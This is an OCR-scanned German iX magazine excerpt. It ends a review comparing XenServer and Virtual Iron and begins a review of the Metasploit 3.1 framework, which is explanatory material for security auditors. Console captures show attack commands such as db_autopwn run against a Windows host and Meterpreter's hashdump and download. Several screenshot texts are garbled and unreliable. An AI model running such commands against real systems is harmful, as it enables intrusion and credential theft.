partition, gefolgt von einer Backup- 
Partition gleicher Größe. Bei einem 
Update kopiert das Setup-Tool die Sys- 
tempartition dorthin. Auf dem verblei- 
benden Bereich richtet es eine LVM- 
Gruppe ein, die Plattenplatz für lokale 
VMs reserviert. Sie bleibt bei einem 
Update erhalten, falls der Administra- 
tor sich dafür entscheidet. 

In drei Schritten baut die Prozedur 
einen XenServer auf: Er partitioniert 
und formatiert die Festplatte, packt eine 
Reihe bzip2-komprimierter Tar-Archi- 
ve aus und richtet den Bootloader grub 
ein. Beim ersten Neustart führt der 
XensServer Abschlussarbeiten durch, in 
denen er unter anderem die Grundkon- 


fehlende Administrationsoberfläche. 


Server. 


VMware antreten wollen. 


A-TRACT 


© Gegen den professionellen Einsatz von Xen als Virtualisierer sprach bisher die 


© Für den Einsatz im RZ bedarf es zudem einer professionellen Unterstützung. 


© Zwei Produkte versuchen die Forderungen zu erfüllen: Virtual Iron und Citrix’ Xen- 


© Bei beiden handelt es sich um komplette Virtualisierungs-Umgebungen, die gegen 
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figuration der SQLite Datenbasis ein- 
richtet. Anschließend kann sich der 
Administrator entweder auf der Kon- 
sole des Host anmelden oder mittels 
XenCenter eine Verbindung zum Sys- 
tem herstellen. Falls vorhanden, muss 
er eine Lizenzdatei auf jeden Host als 
/etc/xensourcellicense kopieren. Das 
gelingt entweder per scp oder über 
XenCenter. 

Erste VMs kann er entweder am 
Host über die Kommandozeile oder be- 
quemer Wizard-gestützt aus XenCenter 
heraus anlegen. Letztere Methode fragt 
nach der Auswahl eines Template, Na- 
men für die VM, CD/DVD-Laufwerk 
oder ISO-Datei als Installationsme- 
dium und Spezifikation der Hardware- 
ausstattung. Das betrifft im Einzelnen 
die Zahl der CPUs (Windows maxi- 
mal 8 Kerne, Linux bis 32), die RAM- 
Kapazität (bis 32 GByte), die Anzahl 
der virtuellen Festplatten (bis 8, CD- 
ROM zählt mit) und die Netzwerkkar- 
ten, von denen der Administrator in 
einem Gast bis zu 7 Stück konfigurie- 
ren kann. Sie dürfen aber auch kom- 
plett fehlen, was etwa den ressourcen- 
sparenden Betrieb einer Live-CD 
ermöglicht. 

Nach dem Einspielen des Betriebs- 
systems für eine VM muss die Integra- 
tion der mitgelieferten XenServer-Tools 
folgen. Das sind paravirtuell arbeitende 
Gerätetreiber, die einerseits den Durch- 
satz im Bereich Netz- und Festplatten- 
zugriff optimieren, andererseits dem 
XenCenter durchschnittliche Auslas- 
tungsdaten dieser Geräte plus der Spei- 
chernutzung der VM liefern. XenServer 
hält dazu eine ISO-Datei bereit, die der 
Anwender an den Gast einfach als 
CD/DVD-Laufwerk anbindet. 


Linux-Gäste von der 
Konsole aus einrichten 


Paravirtualisierte Linux-VMs installiert 
der Administrator vorzugsweise aus ei- 
nem Netz-Repository, alternativ von ei- 
ner CD-ROM oder einem ISO-Abbild. 
Das Einrichten erfolgt im Text-Modus, 
da Anaconda keine Grafikhardware er- 
kennen kann. Nach dem anschließen- 
den Hinzufügen der XenServer-Tools 
muss der Systemverwalter die Konfigu- 
ration des grafischen Display-Mana- 
gers (GDM) modifizieren, damit der 
Gast statt Xorg standardmäßig den 
Xvnc für den Fernzugriff startet. Sämt- 
liche Schritte und die Anpassung der 
Firewall beschreibt das 44-seitige 
Handbuch zur Gast-Installation. 
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Im Test klappte es auch mit voll- 
virtualisierten Linux-VMs. Dazu lie- 
fert der Hersteller jedoch keine Tools, 
sodass außer für die CPUs die Perfor- 
mance-Daten für /O und der VM-Spei- 
cherbedarf im XenCenter nicht sichtbar 
sind. Festplatten sind bei XenServer 
stets QEMU-IDE-Modelle, das CD- 
Laufwerk ist vom Typ QEMU-CD- 
ROM, und die Netzhardware reicht er 
als Realtek RTL-8139 durch. Übrigens 
gelang es, einen vollvirtualisierten 
RHEL-5.1-Clone aus den Sourcen zu 
erstellen. Das Ergebnis diente wäh- 
rend des Tests zum Aufbau weiterer 
Linux-VMs. 

Wer das Installieren der VMs aus 
ISO-Images bevorzugt, der kann für 
den XenServer ein lokales oder ent- 
ferntes ISO-Repository anlegen. Von 
entfernten Systemen per NFS, CIFS 
oder SMBFS bereitgestellte Shares 
bindet das Kommando xe-mount-iso-sr 
an den XenServer-Host. Ein lokales 
Verzeichnis kann man zwar ebenfalls 
nutzen, aber die Autoren des Hand- 
buchs stufen das wegen des knappen 
Plattenplatzes im Root-Dateisystem als 
riskant ein. 

XenServer bindet virtuelle Netz- 
werkkarten über Bridges entweder an 
physische oder unterhält lokale adap- 
terlose „Kommunikationspfosten“, über 
den die VMs eines Host untereinander 
Daten austauschen können. Optionales 
VLAN-Tagging erlaubt es, VMs in or- 
ganisatorische Strukturen einzubetten, 
was der XenServer aber nur für vir- 
tuelle Schnittstellen unterstützt, die an 
eine Netzwerkhardware gekoppelt sind. 

Virtuelle Festplatten erzeugt Xen- 
Server lokal oder remote als Images. 
Sie liegen entweder als Virtual Hard 
Disk (VHD) in Form einer Datei in ei- 
nem lokalen oder per NFS gebundenen 
ext3-Filesystem, einer LVM-Partition 
oder einer LUN, die ein NetApp-Filer 
bereitstellt. Mit CD/DVD-ROM und 
USB-Geräten unterstützt XenServer 
zwei weitere Speichermedien, die er 
VMs als Hotplug-Devices liefern kann. 


TR 


Memory Usage 


POTT rem) 


Network 1/0 


Disk 1/0 
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Huckepack: Virtual Iron auf Windows XP, gehostet von XenServer (Abb. 2) 


VHDs erzeugt XenServer als Sparse- 
Datei, die nur den tatsächlich benötig- 
ten Plattenplatz belegt. Auf lokaler 
Harddisk richtet der Installer standard- 
mäßig LVM ein, was der Administra- 
tor aber nachträglich ändern kann. Via 
Fibre Channel oder iSCSI gebundene 
Shared Storage Repositories müssen 
ebenfalls LVM-Gruppen und -Disks 
verwahren. Shared Storage bildet außer- 
dem die Voraussetzung für XenMotion, 
da diese Funktion bei der Live-Migra- 
tion nur das RAM-Image eines Gasts 
zwischen Systemen innerhalb eines 
Pools verschiebt, nicht aber seinen 
Plattenplatz. 


Experimente 
mit Unterbrechungen 


Das Anbinden über iSCSI unterstützt 
XenServer mit ISCSI-HBAs und einen 
im Produkt enthaltenen iSCSI-Soft- 
ware-Initiator. Der Übung halber ex- 
portierte ein Gast mit HVM-installier- 


tem RHELS-Clone ein iSCSI-Target 
an den betreuenden Host. Im Betrieb 
kam es jedoch zu empfindlichen Per- 
formanceeinbrüchen: Ein schlafender 
Vista-Gast auf demselben System be- 
nötigte mehr als 10 Stunden, um seinen 
16 GByte großen Plattenplatz auf den 
1SCSI-Speicher zu kopieren. Die Pro- 
zedur dauerte 30 Minuten, wenn ein 
zweiter XenServer den iSCSI-Speicher 
vom ersten bezog und seinen lokalen 
Vista-Gast dorthin kopierte. 

Schließlich geht es noch darum, wie 
XenServer mit FC-basiertem SAN zu- 
rechtkommen. Der Testaufbau bestand 
aus vier HS21-Blades von IBM mit in- 
tegriertem ISP2422-Adapter von Qlo- 
gic. Drei waren in einem Pool grup- 
piert, auf dem vierten lief Windows XP. 
Er durfte mit XenCenter das Manage- 
ment für die komplette virtuelle Infra- 
struktur übernehmen. Als Zugang ge- 
nügt ein PC mit Remote Desktop. 

In dieser Umgebung startete das 
Einrichten eines Windows 2003 Server 
als VM, das der Tester mittendrin 
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unterbrach. Als er die Prozedur am 
nächsten Tag fortsetzte, kam sie ohne 
Störungen zum Ende. Anschließend 
ging es um die Migration der VM unter 
Last auf ein anderes System aus dem 
Pool. Zwischen ein und zwei der per 
ping ausgetauschten ICMP-Pakete gin- 
gen verloren, was auf eine Ausfallzeit 
von weniger als 2 Sekunden hindeutet. 
Das aber liegt innerhalb der zumut- 
baren Reaktionszeit und ist somit als 
Zero-Downtime akzeptabel. 

Die zugänglichen Funktionen für 
Pool, Server, VM, Storage und Tem- 
plates sind für die tägliche Arbeit aus- 
reichend, decken aber, wie bereits ge- 
sagt, nicht das volle Leistungsspektrum 
der Xen-API ab. Performance- und 
Log-Informationen zeigt das GUI nur 
seit dem Öffnen einer Session an, und 
die Host- oder VM-spezifischen Daten 
gehen verloren, sowie der Anwender 
die Host-Verbindung schließt oder 
XenCenter beendet. Dringend sollte der 
Hersteller mindestens die Performance- 
daten in einer Datenbasis ablegen, so- 
dass das Produkt Auslastungsstatistiken 
generieren kann. Das fehlt, wäre aber 
bei einem Produkt dieser Preisklasse 
eigentlich zu erwarten. 


= Virtual Iron 


Der Zugriff auf Virtual Iron erfolgt 
analog zum XenServer über eine Re- 
gistrierung auf der Webseite des Her- 
stellers. Innerhalb einer Frist von 24 
Stunden verspricht er die Zusendung 
einer Download-Adresse und eines Li- 
zenzschlüssels mit 30-tägiger Gültig- 
keit. Das kann, wie im Test, länger 
dauern, da Virtual Iron seine Kunden 
nicht direkt bedient, sondern das von 
einem regionalen Vertriebler erledigen 
lässt. Im vorliegenden Fall hat die „Be- 
arbeitung“ eine Woche gedauert. Die er- 
ste E-Mail enthielt URLs zum Zugriff 
auf die Virtual Iron Enterprise Edition 
4.2.13 für Windows (164 MByte Install- 
Anywhere Exe), Linux (187 MByte 
Shell-Archiv) und einen Lizenzschlüs- 
sel für 20 Sockel, eine spätere alles für 
die Version 4.3.8. 

Virtual Iron ist in zwei Versionen 
erhältlich: Die freie „Single Server 
Edition“ kann bis zu 12 VMs mit ei- 
ner virtuellen CPU steuern und hält 
die Gast-Images auf der lokalen Fest- 
platte. Die Obergrenze der Ausstattung 
liegt bei fünf virtuellen Netzwerkkarten 
und 15 virtuellen Festplatten pro Gast. 
In der pro Sockel lizenzierten „Extended 
Enterprise Edition“ (EE) lautet das Kon- 
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zept „Bare Metal Virtualization“ unter 
anderem mit den Merkmalen virtuelles 
SMP (maximal acht pro Gast), Unter- 
stützung von iSCSI- und FC-basiertem 
Shared Storage sowie VLAN. Des 
Weiteren sind Funktionen enthalten, 
die Virtual Iron LiveMigration, Live- 
Maintenance, LiveRecovery und Live- 
Capacity nennt. Obendrein bündelt er 
„BEE“ mit dem LiveConvert genannten 
PowerConvert von PlateSpin und bringt 
pro Sockel sechs Lizenzen für Konver- 
tierungen von Physical to Virtual (P2V) 
oder Virtual to Virtual (V2V) mit. 

Der Einsatz von Virtual Iron EE setzt 
ein Managementsystem mit mindestens 
einer CPU, 2 GByte RAM, 30 GByte 
Plattenplatz und zwei Netzwerkports 
voraus. Die vollständig in Java ge- 
schriebene Oberfläche braucht mindes- 
tens JRE 1.5 und läuft auf RHEL 4 und 
SLES 9 in der 32-Bit- oder 64-Bit-Ver- 
sion sowie unter Windows Server 2003 
(32-Bit). Im Test dienten RHEL 5.1 und 
Windows Server 2003 mit 2 GByte 
RAM als Grundlage für die Manage- 
mentsoftware, die zur Laufzeit etwa 
700 MByte beanspruchte. 


Sogenannte „Managed Server“, auf 
deren Dienste die Steuerungssoftware 
zugreift, müssen Intels VT- oder AMDs 
V-CPUs enthalten. Dort zählen 2 GByte 
RAM, zwei Ethernet-Ports und laut 
Hersteller ein CD/DVD-Laufwerk vor 
Ort zur Mindestausstattung. Lokaler 
Plattenplatz zur Aufnahme von Hyper- 
visor und den DomO-Tools ist nicht 
erforderlich, da die Managed Server 
stets via PXE booten und die gesamte 
Software vom Managementsystem be- 
ziehen: Bare Metal Virtualisierung mit 
Xen 3.1, Suse Kernel 2.6.16 und 64- 
Bit-DomO. 


Bezug zum 
Installationspfad 


Beim Einrichten der Software verlangt 
Virtual Iron eine gültige Lizenzdatei. 
DHCP aus den Cygwin Tools und al- 
les Weitere liefert das Produkt mit 
und konfiguriert die Komponenten, 
während es den Managementserver 
installiert. Unter Windows richtet es 
einen neuen Service ein. Wer für seine 
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Managed-Server-Hardware spezielle 
Boot-Parameter benötigt, muss die Da- 
tei default unterhalb bootfiles/micro- 
kernel/RELEASE/pxelinux.cfg relativ 
zum Installationspfad ändern. Im Test 
war es auf einem System erforderlich, 
dem Linux-Kernel die Option pci= 
nommconf mitzugeben. 

Das Sicherheitskonzept von Virtual 
Iron setzt eine Trennung von Manage- 
ment- und Produktivnetz voraus. Wer 
iSCSI nutzen möchte, muss dafür eine 
weitere Schnittstelle spendieren. Min- 
destanforderung an Massenspeicher ist 
laut Hersteller lokaler SATA-Platten- 
platz. Damit sind aber Mehrwertfunk- 
tionen wie die Migration virtueller Ma- 
schinen nicht zugänglich. 


Frische Massenspeicher 
erforderlich 


Für Shared Storage unterstützt Virtual 
Iron iSCSI und FC-SAN, auf denen es 
jeweils LVM-Volumen einrichtet. Lei- 
der geht der Hersteller davon aus, „fri- 
sche“ Hardware vorzufinden: Das Initi- 
ieren einer LUN im SAN schlägt fehl, 
wenn dort eine Volume Group vorhan- 
den ist. Erst nach dem Löschen der 
Strukturinformationen kann das Ma- 
nagement System die LUN in den ge- 
wünschten Grundzustand überführen. 
Virtual Iron nennt dieses Verhalten ein 
„Feature“, da die Software so vor dem 
Löschen von Fremddaten schütze. Statt 
eines passenden Hinweises terminiert 
dieser Job aber mit einer „internen“ 
Fehlermeldung. 

Es reicht, wenn ein Managed Server 
innerhalb einer virtuellen Infrastruktur 
im Managementnetz integriert und 
BIOS-seitig für das Hochfahren über 
die betreffende Schnittstelle konfigu- 
riert ist. Die Software erkennt die 
DHCP-Anfrage, generiert eine Kopie 
der PXEboot-Default-Datei mit seiner 
IP-Adresse gemäß DHCP-Lease in 
Hex-Notation und wartet auf die Be- 
reitschaft eines Agenten im Server, der 
daraufhin die Gegenstelle zum Ma- 
nagement bildet. Ein Login-Prompt 
stellt der Managed Server übrigens 
nicht bereit — einzig das Management 
System darf mit den Knoten Kontakt 
aufnehmen. Nachträgliche Änderungen 
an der Host-Hardware berücksichtigt 
das Management nach einem simplen 
„Rediscover‘ des Host. 

Von Hardwareherstellern mitgelie- 
ferte Managementmodule für das Intel- 
ligent Platform Management Interface 
(IPMI) oder HPs Integrated Lights-Out 


iX 6/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


71 


Xen 


(ILO) sind in das Produkt integriert. 
Damit soll der Anwender die Server 
über das GUI ein- und ausschalten kön- 
nen, nachdem man den Adressbereich 
der Baseboard Management Controllern 
(BMC) angepasst hat und im BIOS die 
im Managementnetz genutzte Maske 
gesetzt hat. Auf IBM HS21 gelang das 
im Test nicht, da die BMCs der Blades 
nur mit dem Management Modul des 
Bladecenter verbunden sind und keine 
Out-of-Band Steuerung unterstützt. Vir- 
tual Iron konnte die Serviceprozessoren 
erkennen, Ein-/Ausschalten per IPMI 
gelang aber nicht. 

Erwartungsgemäß erfolgt das Konfi- 
gurieren der VMs per Wizard. Dabei 
kann man zunächst nur eine Netzwerk- 
karte und eine Plattenpartition angeben. 
Da eine erstmals konfigurierte VM aber 
nicht automatisch startet, kann der Ad- 
ministrator sie vorher seinen Wünschen 
entsprechend anpassen. Eine Boot-Rei- 
henfolge gibt es für VMs nicht; es geht 
nur ein Medium: die Festplatte, ein lo- 
kales CD/DVD-Laufwerk, eine ISO- 
Datei auf dem Managementsystem als 
Networked Block Device (NBD) oder 
PXE. In der Regel ist nach dem Ein- 
richten des Betriebssystems ein Um- 
konfigurieren erforderlich. Optimierte 
paravirtualisierte Treiber für 32- und 
64-Bit-Windows (MSI) und -Linux 
(RHEL 3.x, 4.x, 5.x, SLES 9/10, RPM- 
und SRPM-Format) liefert der Herstel- 
ler als VS-Tools mit. 

Die Managementoberfläche gliedert 
sich in Ressource Center, Hardware, 
Policies & Reports, Jobs und Users. 
Unter dem Punkt Hardware geht es um 
die Konfiguration von Netzen und Plat- 
tenpartitionen. Im Ressource Center 
gruppiert der Administrator die Hard- 
warekomponenten in Data Centern. 
Dort muss er VMs anlegen und kann 


die dafür gültigen Funktionen anwen- 
den: Starten, Beenden, Konsole zur VM 
aktivieren, VM verschieben oder einen 
Snapshot erstellen. Ausgeschaltete VMs 
können als Vorlage für neue dienen; ei- 
ne Clone-Funktion erzeugt ein Duplikat, 
was auch mit Snapshots geht, sodass in- 
direkt das Clonen laufender VMs ge- 
lingt. Aktiviertes LiveRecovery erlaubt 
das automatische Verschieben, falls der 
beherbergende Knoten offline geht. 


Berichtswesen mit 
Anhang 


Im Bereich Policies & Reports verfügt 
der Systemverantwortliche insgesamt 
über 12 Arten von Berichtsgeneratoren, 
strukturiert nach Reports, User und Sys- 
tem Policies. So erzeugt ein Node-Re- 
port zu jedem Managed Server Anga- 
ben über Zustand, vorhandenen und 
genutzten Speicher sowie die zugewie- 
senen VMS. Auslastungsstatistiken feh- 
len bisher. Als Grundlage der Reportge- 
neratoren fungieren Python-Scripte, die 
ein Wrapper mit den Java-Komponen- 
ten von Virtual Iron verbindet. Darüber 
greifen die Scripte auf die API des Pro- 
dukts zu. Das soll Anwendern und Ent- 
wicklern einen Rahmen zum Aufbau ei- 
gener Anwendungen bieten. Siebzehn 
Pakete der API definieren stolze 520 
Klassen. 

Das Users-Menü schließlich regelt 
die lokalen Rechte der Benutzer, auf 
Wunsch mit Kopplung an einen 
LDAP-Server. Laut Hersteller kann der 
Administrator in einer nächsten Ver- 
sion des Produkts Rollen vergeben. 

Zum Backup und Restore von VMs 
in Virtual Iron kann der Anwender 
VMs beziehungsweise Disk-Images von 
VMs im Format der Virtual Hard Disk 


ÖX-Wertung 


Citrix’ XenServer 

@® voll- und paravirtualisierte Linux-VMs 

© Hotplug-USB-Disks und -Sticks 

©® Import/Export von Open Virtual 
Appliance Images 

© eingeschränkte Verwaltung im GUI 


© Performancedaten zu grob und 
ohne DB-Unterstützung 


© keine Treiber-Tools für vollvirtualisiertes 
Linux 
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Virtual Iron 
© konsequente Out-Of-Band-Administration 
© Floppy-Unterstützung 


© zusätzliche Funktionen wie HA und 
Snapshot 


© Skripte für Reportgeneratoren 
© Performancedaten zu grob und 
ohne DB-Unterstützung 


© Lizenzierung nur über Vertretung 
vor Ort 


(VHD) exportieren und entsprechend 
formatierte Images zurückladen. Das 
Produkt unterstützt ein dynamisches 
und ein festes VHD-Format. Zum an- 
deren ermöglicht die GUI auf Knopf- 
druck eine Sicherung des gesamten Zu- 
stands der Konfigurations-Datenbank. 
Virtual Iron führt das per Default täg- 
lich durch und belegt pro Datensatz 30 
MByte oder mehr. Die Zahl der maxi- 
mal verwahrten Backups liegt bei 10, 
Rücksicherungen kann der System- 
administrator nur manuell ausführen. 


Fazit 


Virtual Iron und Citrix’ XenServer wol- 
len die Ansprüche potenzieller Anwen- 
der mit eigenen Konzepten erfüllen: 
Virtual Iron darf als GUI-Sieger gelten, 
enthält HA- und Snapshot-Unterstüt- 
zung, bringt IPMI- und ILO-Support 
mit — kann aber nur LVM-orientierten 
Plattenspeicher handhaben. XenServer 
muss im GUI-Umfeld nachlegen, bietet 
aber mit seiner konsequenten Client- 
Server-Architektur und der Xen APl als 
Schnittstelle ein nahezu unbegrenztes 
Potenzial, wie es von heutiger Server- 
Virtualisierung zu erwarten ist. 
Aufgrund fehlender Unterstützung 
für ältere Betriebssysteme wie Win- 
dows NT und dergleichen liegen die 
Vorteile der Produkte vordergründig im 
vereinfachten Zugang zur Virtualisie- 
rung mit Xen. Die beim nativen Xen 
enthaltene Unterstützung von logischen 
SCSI-Treibern für VMs fehlt. Vor al- 
lem die nicht vorhandene Langzeitar- 
chivierung von Auslastungsstatistiken 
und Rollenstruktur für Administratoren 
zeigen, dass beide im direkten Ver- 
gleich mit den Produkten von VMware 
zurückstehen. (rh) 
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Security 


ie Zahl der Tools mit dem pri- 
mären Fokus Schwachstellen- 


entdeckung ist Legion. Die 
meisten haben eines gemeinsam: Sie 
informieren über gefundene Schwach- 
stellen und teilen gegebenenfalls ei- 
nen Weg zu deren Beseitigung mit — 
etwa das Einspielen von Patches. 
Worauf die meisten verzichten, ist das 
aktive Ausnutzen der Schwachstelle, 
etwa durch das Einschleusen einer 
Spionagesoftware. 

Somit kann der Sicherheitsauditor 
den realen Angriff nur mit hohem Auf- 
wand in der Praxis nachstellen — als 
Anhaltspunkte seien nur genannt die 
Exploitsuche im Internet, Kompilie- 
rung, die Analyse des Exploits, Aus- 
wahl eines möglichen nachzuladenden 
Schadprogramms (Payload). Genau 
hier setzt das Metasploit Framework 
an, eine freie Entwicklungs- und An- 
griffsumgebung, die im Juli 2003 H D 
Moore ins Leben rief. Moore, damals 
Direktor der Sicherheitsforschung bei 
Breakingpoint Systems, war es auch, 
der im Jahr 2006 das „Month of Brow- 
ser Bugs“-Projekt (MoBB) startete. Ziel: 
Jeden Tag eine Browser-Verwundbar- 
keit veröffentlichen. 


Überall zu Hause 


Das Metasploit Framework läuft auf 
allen gängigen Betriebssystemen. Seit 
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Metasploit 3.1 


Jörg Riether 


Version 3.0 wird es komplett in Ruby 
entwickelt (vorher in Perl). Die Bedie- 
nung lässt an Vielfalt kaum Wünsche 
offen; so kann man das Metasploit 
Framework sowohl über ein Konso- 
len-Interface nebst Tab-Komplettie- 
rung, über ein Ajax-veredeltes Web- 
interface, eine Gtk-GUI oder über das 
Scripting Interface auf der Komman- 
dozeile komfortabel steuern. Die neue 
Version 3.1 bringt darüber hinaus ein 
echtes Schmankerl für die Windows- 
Benutzer, nämlich ein komfortables 
Windows-GUI. 

Ganz gleich, für welche der zahlrei- 
chen Bedienmöglichkeiten man sich 
entscheidet, ein typisches Angriffspro- 
zedere läuft weitgehend gleich ab. Zu- 
nächst sucht man sich ein Angriffsziel 
und einen passenden Exploit. Insbeson- 
dere Letzteres lässt sich über eines der 
möglichen GUIs komfortabel mithilfe 
der Suchfunktionen erledigen. Die An- 
zahl der vorhandenen Exploits ist be- 
achtlich und wird durch die interne Up- 
date-Funktion ständig erweitert. Zum 
aktuellen Zeitpunkt stellt das Frame- 
work über 260 Exploits zur Verfügung, 
für sämtliche gängigen Betriebssys- 
teme, Applikationen und Hardware- 
Schwachstellen. Selektiert man einen 
potenziellen Exploit, zeigt einem Meta- 
sploit die verwundbaren Betriebssyste- 
me samt Service-Pack-Level und gibt 
hilfreiche Informationen nebst weiter- 
führender Links aus. 


Gefährliche 
Experimente 


Das Metasploit Framework erlaubt das gezielte 
Experimentieren mit den Schwachstellen von 
IT-Systemen. Mit Version 3.1 ist nun auch eine 
komfortable Windows-GUI-Version verfügbar, 
die es auch mäßig Informierten erlaubt, mit 
Sicherheitslücken zu experimentieren. 


Als Nächstes wählt man das An- 
griffsziel, zum Beispiel Windows Ser- 
ver 2003 SPx. Darauf folgt die Wahl ei- 
nes Payload, also der durch den Exploit 
übertragenen Malware. Auch hier hält 
das Framework eine Fülle von Mög- 
lichkeiten parat. Über 115 potenzielle 
Payloads, ebenfalls ständig über die 
Update-Funktion erweitert, stehen zur 
Auswahl bereit. An dieser Stelle kommt 
ein gewichtiges Feature des Metasploit 
Framework zum Einsatz. Allein an- 
hand des gewählten Exploit vermag 
das Framework dem Nutzer automa- 
tisch die passenden Angriffsziele sowie 
die aktuell passenden Payloads zur Aus- 
wahl anzuzeigen. Ist zum Beispiel ein 
Payload zu groß für den zu beschrei- 
benden Speicherbereich auf dem An- 
griffsziel oder gar nicht auf dem Ziel- 
system lauffähig, wird er ausgeblendet. 
Die Payloads gehen in Funktionsum- 
fang und Vielfalt weit über die gängi- 
ge BindShell (eine Kommandozeile auf 
dem Zielsystem) hinaus. 

All diese Varianten im Detail zu be- 
leuchten würde den Rahmen dieses Ar- 
tikels sprengen, aber zumindest zwei 
wirklich beeindruckende Varianten sol- 
len nicht unerwähnt bleiben. 

Zum einen besteht die Möglichkeit, 
einen VNC-Server mit dem Payload 
vncinject nebst allen nötigen Parametern 
auf das Zielsystem zu laden und dort 
zu starten. Alles vollautomatisiert, ver- 
steht sich. Eine vor allem optisch sehr 
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beeindruckende Geschichte für Men- 
schen, die der Aufklärung in puncto 
Trivialität eines erfolgreichen Angriffs 
bedürfen. Für den erfahrenen Angreifer 
hingegen stellt dieser Payload sicherlich 
nicht die erste Wahl dar, besteht doch die 
Gefahr, sehr schnell erkannt zu werden. 
Letzterer dürfte sich eher für die einfa- 
che Shell oder aber den Meterpreter, be- 
eindruckende Variante Nummer zwei, 
entscheiden. Der Meterpreter wird spä- 
ter noch genauer beleuchtet; nur so viel 
vorab: Es handelt sich um einen extrem 
vielseitigen Payload mit nahezu unbe- 
grenzten Möglichkeiten. Ist auch die 
Wahl des Payloads abgeschlossen, fol- 
gen letzte Konfigurationsschritte, Details 
der Ausführung des Angriffs betreffend. 


GUI für Ersttäter 


Als wichtigster Punkt wäre hier das 
Ziel zu nennen, im Metasploit Frame- 
work „Remote Host“ (kurz RHOST) 
genannt. Der Zielport (RPORT) ist 
durch den Exploit vorgegeben, jedoch 
modifizierbar. Außerdem lassen sich 
unzählige Spezialparameter mitgeben, 


* Abetunpieit Framnemssrk GUN EI -relante 
Atem Werden Biel 
ihm iteeeien Zuchen| Sat 


eb 4 Mosuie 
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BOOST 3 Thun haget andahnn 
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Der Meterpreter auf einem 


Mac in Aktion. Hierkommen i: 


die Meterpreter-Befehle Is, 
download, hashdump und 
idletime zum Einsatz (Abb. 2). 


gegliedert in die drei Unterkategorien 
Standard, Advanced und Evasion. Nach 
den Pflichtangaben kann es mit dem 
Angriff losgehen. 

Für erste Versuche empfiehlt sich das 
neue Windows-GUI. Es ist nicht nur 
übersichtlich und deckt trotzdem die 


Bde | Microsoft RPC DCOM Interface Overtlow 


neterpretar > douno 
[*] downloading: boot 
Lossed 
neterpreter > 


Windows-GUI im 
Einsatz auf einem 
Vista PC (Abb. 1) 


ke @n9_. Terminal, — ruby — 


meternretar > I8 


komplette Feature-Vielfalt des Frame- 
work ab, sondern kann darüber hinaus 
in einigen Bereichen direkt mit dem 
Meterpreter interagieren. 

Gewiefte Angreifer haben in der Re- 
gel ein Stück Software als Payload an 
der Hand, das bestimmte Aufgaben auf 
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Security 


Metasploit Console 


Cosei * 


mef > load db_sglites 

I*] Successfully loaded plugin: db_sqlire3 
usf > db_create ix 

[*] Creating a new database instance 

[*] Successfully tonnecred to che darabase 
i*] File: ix 

usf > db nmap 192.169.2,132 


"C:\Programme\Nnap/nmap.exe” "192.166. 


?: Starting Haap 4.50 ( hrrp: /finsecurs.org ) 


: Interesting p 
: Nor show: 1706 
STATE 5 
open 
open 
5 open mierosoft-ds 
: 1025/ecp open NFS-or-IIS 
1026/ecp open LSA-or-nrerm 


MAC Address: 00:0C:23:BkrA4:19 (VMMrare) 


Unap done: 1 IP address (l host up) scanne 


wet > do_hosts 
[*] Host: 192.169.2.132 


Die Vorbereitungen für db_autopwn 


sind abgeschlossen (Abb, 3). 


Metasploit Console 


bt wurhoriey\syeree 


C: \VINDOWE\ayaran32> 


| CHWINDOW Sn pstem325 


Nach einem Schuss ins Blaue auf ein 
ungepatchtes Windows 2003 mit 
db_autopwn -t-p -e -s -b steht sofort 


eine Session bereit (Abb. 4). 


Metasploit-Homepage: 
www.metasploit.com 

Meterpreter-Referenz: 
www.metasploit.com/documents/ 
meterpreter.pdf 

Metasploit Framework 3.1: 
www.metasploit.com/framework 

Benutzeranleitung: 
www.metasploit.com/documents/ 
users_guide.pdf 

Entwickleranleitung: 
www.metasploit.com/documents/ 
developers_guide.pdf 
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dem Zielsystem erleichtert, sozusagen 
ein kleines Schweizer Taschenmesser. 
Der Meterpreter ist verglichen damit 
eine ganze Sammlung von Werkzeug- 
kästen. Der enorme Unterschied ist 
schnell erklärt: Meterpreter kann live 
Erweiterungen nachladen, wodurch sei- 
ne Einsatzszenarien nahezu unbegrenzt 
sind. Darüber hinaus laufen sowohl 
der Meterpreter selbst als auch seine 
Erweiterungen direkt im Speicher des 
Zielsystems und kommen nicht mit der 
Festplatte in Kontakt. Außerdem star- 
tet Meterpreter immer im Kontext der 
Anwendung, die die Schwachstelle auf- 
weist, es wird also kein neuer Prozess 
auf dem Zielsystem gestartet. 

Einige Erweiterungen liefert Meter- 
preter von Haus aus mit, zum Beispiel 
fs. Damit lassen sich beliebige Dateien 
vom oder auf das Ziel laden. Mit der 
Erweiterung ner lassen sich unter an- 
derem lokale Port-Weiterleitungen auf 
dem Opfer einrichten, die auf das 
Zielnetzwerk zielen und dem Angrei- 
fer das Tor zu internen Systemen Öff- 
nen, die er von draußen nie hätte errei- 
chen können. In der aktuellen Version 
braucht man diese beiden Module 
nicht einmal von Hand nachzuladen, 
sie gehören jetzt zur stdapi und sind 
sofort verfügbar. Last but not least 
vermag Meterpreter seinen gesamten 
Netzverkehr zu verschlüsseln. Eine 
komplette Referenz des Meterpreters 
kann man sich auf der Metasploit- 
Homepage ansehen (siehe Links). 


Mit Brute Force im Netz 


Eines der wichtigsten, wenn auch nur 
mit größter Vorsicht zu benutzenden 
Features ist die Funkion db_autopwn. 
Dahinter verbirgt sich vereinfacht gesagt 
die Möglichkeit, eine Brute-Force-Atta- 
cke in Form aller passender Exploits des 
Metasploit Framework auf ein ganzes 
Netz vollautomatisiert loszulassen. Im 
Detail: Man untersuche mit nmap eines 
oder mehrere Angriffsziele auf offene 


Daten und Preise 


Metasploit 3.1 
Entwicklungs- und Angriffsumgebung 


www.metasploit.com 


Anbieter: community project managed by 
Metasploit LLC 


Betriebssysteme: Windows, Mac OS X, Linux, 
Unixe 


Ports und die dahinter steckenden An- 
wendungen (nebst Version), schreibe 
diese Informationen in eine zuvor einge- 
richtete Datenbank und starte dann auf 
dieser Basis die passenden Exploits. 
Alles vollautomatisch, versteht sich. 

db_autopwn tut genau dies. Diese 
Funktion ist deshalb so gefährlich, 
weil man damit zum einen einfach ins 
Blaue schießen kann, ohne sich auch 
nur ansatzweise mit der Auswahl ei- 
nes Exploits beschäftigen zu müssen, 
zum anderen vermag db_autopwn, los- 
gelassen auf ein großes Netzwerk mit 
vielen ungepatchten Maschinen, viele 
Systemabstürze oder Defekte hervor- 
rufen. Der Sicherheitsauditor sollte al- 
so genau wissen, was er tut, oder sich 
warm anziehen. 


Fazit 


